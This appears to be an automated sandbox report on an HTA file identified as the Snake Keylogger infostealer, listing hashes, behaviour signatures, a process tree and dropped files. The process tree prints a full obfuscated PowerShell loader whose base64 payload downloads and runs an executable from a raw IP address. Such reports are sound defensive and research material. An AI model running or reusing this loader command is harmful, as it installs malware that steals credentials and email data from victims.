Overview

overview

10

Static

static

1

17116a0f43...7a.hta

windows7-x64

10

17116a0f43...7a.hta

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    27-09-2024 08:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    17116a0f43508549998ef6618154d77a.hta

  • Size

    115KB

  • MD5

    17116a0f43508549998ef6618154d77a

  • SHA1

    e71af8b0489263e476521a5fd6e22e5511369c4d

  • SHA256

    1c6d98ce8a37adc665452a1ca4bfa1fd5b347de7654578503527e28e90275f64

  • SHA512

    a6824f19100e0fd4c996ab8db64875fb1c0c0e4d045792793b45ad1e93cb358c6746289209d8d1f4634c6ebed9ade9e43a5b3407856780e7e60954efc249e9d9

  • SSDEEP

    96:Ea+M7wmf6PCZ60NUrnPmeobQk9B6/A6I6L1j+Z668AT:Ea+Qwmf6PCZ6kUTWfz6Y6dKZ6+T

Score
10/10
snakekeyloggercollectiondefense_evasiondiscoveryexecutionkeyloggerstealer

Malware Config

Extracted

Family

snakekeylogger

Credentials

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

    stealerkeyloggersnakekeylogger
  • Snake Keylogger payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 1 IoCs
    defense_evasionexecution
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\17116a0f43508549998ef6618154d77a.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:388
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c POwerSheLl -eX BypASs -nop -W 1 -c DevIceCrEdeNTiAldEplOymENT.Exe ; Iex($(iEX('[sYStem.tEXt.ENcoDINg]'+[char]0x3a+[ChAR]0X3a+'UTf8.GEtStRiNG([SyStem.cOnvErt]'+[char]0x3A+[char]0x3a+'FROMBasE64STRIng('+[CHAr]0X22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVmSW5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmNzY1NJTSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaQ3FpWEIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxvSkRMcGx6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuZEdHIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBya1lBRVF4ekt4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNi82MDAvZGxsaG9zdC5leGUiLCIkRU52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c1RBclQtU0xlRVAoMyk7U3RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[CHAR]0X22+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2468
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        POwerSheLl -eX BypASs -nop -W 1 -c DevIceCrEdeNTiAldEplOymENT.Exe ; Iex($(iEX('[sYStem.tEXt.ENcoDINg]'+[char]0x3a+[ChAR]0X3a+'UTf8.GEtStRiNG([SyStem.cOnvErt]'+[char]0x3A+[char]0x3a+'FROMBasE64STRIng('+[CHAr]0X22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVmSW5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmNzY1NJTSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaQ3FpWEIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxvSkRMcGx6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuZEdHIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBya1lBRVF4ekt4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNi82MDAvZGxsaG9zdC5leGUiLCIkRU52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c1RBclQtU0xlRVAoMyk7U3RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[CHAR]0X22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1820
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d2zhicyl.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2288
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD818.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD807.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2784
        • C:\Users\Admin\AppData\Roaming\dllhost.exe
          "C:\Users\Admin\AppData\Roaming\dllhost.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:2544
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Users\Admin\AppData\Roaming\dllhost.exe"
            5⤵
            • Accesses Microsoft Outlook profiles
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:320

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RESD818.tmp
    Filesize

    1KB

    MD5

    c097e9ac1b3b1854499f47780dc5ad86

    SHA1

    e31641b6718d737578129fd4064521622ecb12f6

    SHA256

    b3b4829a00460a4afd97d4622e947028c4e6656c58624c3ed7262c818dbd1f18

    SHA512

    66c702454dda6a566e9d6a773c7ddba2089d910ad067c2d45d3b083fe4f4d1feba62c92c50382c083c1846747efebaaf6b97ae0eca0ad92fa3bba0e2be7b7f05

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\d2zhicyl.dll
    Filesize

    3KB

    MD5

    68cbe1b350efce02efaf154f3819ba2f

    SHA1

    8ef5dbc1ef0c4f3d71b835a3217d5abd9a1c087a

    SHA256

    3d7c8cb0fee21ddb55d07ed7d63e1d8959a5f50fea0d6c64ee3fbceedae37eb8

    SHA512

    3b5ab0608f5a33bbaa7d95fbf8d1810153881002defaa999f1a68589c29c8e12d0f302752c37989db42e6f5412996e624bf61665faa007eaa3cefc66e08df863

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\d2zhicyl.pdb
    Filesize

    7KB

    MD5

    b3fbc51f848268086e9694b6da702fdb

    SHA1

    32335cd14e9fd5ab55b9aa1d3a72336a837e93c1

    SHA256

    04144f553041d05dd99fa5faff4fd845c168a7adaa645690e40b60c449f4597b

    SHA512

    230749fde7b73d320062060ab0247ba348ec50c2ac3735dec01294ed165ab6bc87f02218a56d904217a6ad2cf6091c2f4f931e1ffa20d0e2aeb02a88bb224899

    Download Submit

  • C:\Users\Admin\AppData\Roaming\dllhost.exe
    Filesize

    956KB

    MD5

    249f4ca7f1cc801c87cebd0cdf0b398e

    SHA1

    1241f91fa9239ed0553c33f6d3651644813f6f84

    SHA256

    b639e9680b5ac670c7b58863479c1cf9c7bea436aee481fa9729c6a82508e556

    SHA512

    0b6ae1f507b5599f9fb651576e12ae378b66111193623d806f0e6266e8ee93f1fa5dedd4d4b96f3360fecc81962b76e9bacc7c1096a96df5b33fbd64aa6a18d6

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCD807.tmp
    Filesize

    652B

    MD5

    658624169ddc8e2ae3769bea09d71096

    SHA1

    f9d3330642c9685654a9293b81b8cb88a7e25b2e

    SHA256

    0d838d7f097d23019ed2dae76970228b6fb7ebc4baf8f3757487fbd417646ef8

    SHA512

    6f65fc6cc2c440b6d3d1376621a165129a4396532aa4aab0f9483dccc9b50a505abf5f17c89445b22ffcbd6f510fb07d54e711025ff6968ed2c24676ca42359f

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\d2zhicyl.0.cs
    Filesize

    475B

    MD5

    74ac079a164eedfd18ee0237dead2da7

    SHA1

    62575f712ded8ea2637ee5e5eda8ae9cf2919dc1

    SHA256

    6c72d2a89a0a1d35a067d9322c4c94503d5a75a2e6308cbf9b7bc95e9396f615

    SHA512

    7994aaef91f02e10fd65e782063492a1658e9b1e6e6ffa3a54fce1ab14b39c19bbd3b61cea46908f87cfde0466ef53e3be352c003db797bef0c9f67875285dbb

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\d2zhicyl.cmdline
    Filesize

    309B

    MD5

    4f0a351214162f1b9fefeea760bec1b4

    SHA1

    9f169633e805cac4918da616bb92577c7ad48635

    SHA256

    9e4df52152ac3a8a45e094a0aa8261bebb3f8e80d092300130bf9eb45c1827ed

    SHA512

    644b545538e6a99f5ccd9fb38c58e8af2f32b99236ff2cf472cf71e0763e8743f0aa7611ca1fc2516296276616ef9795fca294f79f631f691afef5e882a977b2

    Download Submit

  • memory/320-29-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

    Download

  • memory/320-31-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

    Download

  • memory/320-30-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

    Download